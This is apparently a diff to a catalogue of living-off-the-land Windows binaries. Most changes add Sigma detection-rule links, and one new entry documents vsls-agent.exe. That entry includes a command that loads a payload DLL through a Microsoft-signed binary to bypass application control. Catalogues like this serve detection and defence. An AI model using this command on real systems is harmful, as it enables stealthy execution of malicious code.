yml/OtherMSBinaries/Remote.yml

@@ -32,6 +32,7 @@ Code_Sample:
   - Code:
 Detection:
   - IOC: remote.exe process spawns
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml
 Resources:
   - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
 Acknowledgement:

yml/OtherMSBinaries/Squirrel.yml

@@ -44,6 +44,8 @@ Full_Path:
 Code_Sample:
   - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml
 Resources:
   - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
   - Link: https://twitter.com/reegun21/status/1144182772623269889

yml/OtherMSBinaries/VSIISExeLauncher.yml

@@ -16,6 +16,7 @@ Full_Path:
 Code_Sample:
   - Code:
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml
   - IOC: VSIISExeLauncher.exe spawned an unknown process
 Resources:
   - Link: https://github.com/timwhitez

yml/OtherMSBinaries/VisualUiaVerifyNative.yml

@@ -1,4 +1,3 @@
----
 Name: VisualUiaVerifyNative.exe
 Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
 Author: Jimmy (@bohops)
@@ -19,6 +18,7 @@ Code_Sample:
   - Code:
 Detection:
   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml
   - IOC: As a Windows SDK binary, execution on a system may be suspicious
 Resources:
   - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/

yml/OtherMSBinaries/Wfc.yml

@@ -17,6 +17,7 @@ Code_Sample:
   - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
 Detection:
   - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml
   - IOC: As a Windows SDK binary, execution on a system may be suspicious
 Resources:
   - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/

yml/OtherMSBinaries/Winword.yml

@@ -31,6 +31,7 @@ Full_Path:
 Code_Sample:
   - Code:
 Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml
   - IOC: Suspicious Office application Internet/network traffic
 Resources:
   - Link: https://twitter.com/reegun21/status/1150032506504151040

yml/OtherMSBinaries/vsls-agent.yml

@@ -0,0 +1,22 @@
+---
+Name: vsls-agent.exe
+Description: Agent for Visual Studio Live Share (Code Collaboration)
+Author: Jimmy (@bohops)
+Created: 2022-11-01
+Commands:
+  - Command: vsls-agent.exe --agentExtensionPath c:\path\to\payload.dll
+    Description: Load a library payload using the --agentExtensionPath parameter (32-bit)
+    Usecase: Execute proxied payload with Microsoft signed binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
+Full_Path:
+  - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml
+Resources:
+  - Link: https://twitter.com/bohops/status/1583916360404729857
+Acknowledgement:
+  - Person: Jimmy
+    Handle: '@bohops'